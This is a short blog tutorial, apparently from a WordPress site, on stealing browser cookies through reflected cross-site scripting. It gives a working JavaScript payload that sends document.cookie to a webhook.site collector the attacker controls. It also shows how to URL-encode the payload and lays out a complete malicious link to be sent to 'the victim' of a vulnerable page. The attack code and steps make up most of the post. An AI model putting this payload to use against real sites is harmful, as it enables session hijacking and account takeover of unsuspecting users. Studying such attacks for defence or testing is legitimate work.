WebApp 101

Using Cross Site Scripting (XSS) to Steal Cookies

We can leverage the following website so that we do not need our own webserver. https://webhook.site/

With a webhook in hand, we’re ready to craft our payload. Our payload should look like this. We’ll want to make sure we replace the URL with our generated webhook address.

A simple test can first be created with this:

<img src="[URL]/test.jpg" /> <script src="http://[URL]/test.js"></script>
document.write('<img src="[URL]?c='+document.cookie+'" />');

Once the browser renders the JavaScript the <img tag should look like the following and send the cookies to our website:

<img src="[URL]?c=[COOKIE]"/>

Before sending the link to the victim, make sure you encode the + symbols by replacing them with %2b.

An example payload will look like the following:

http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s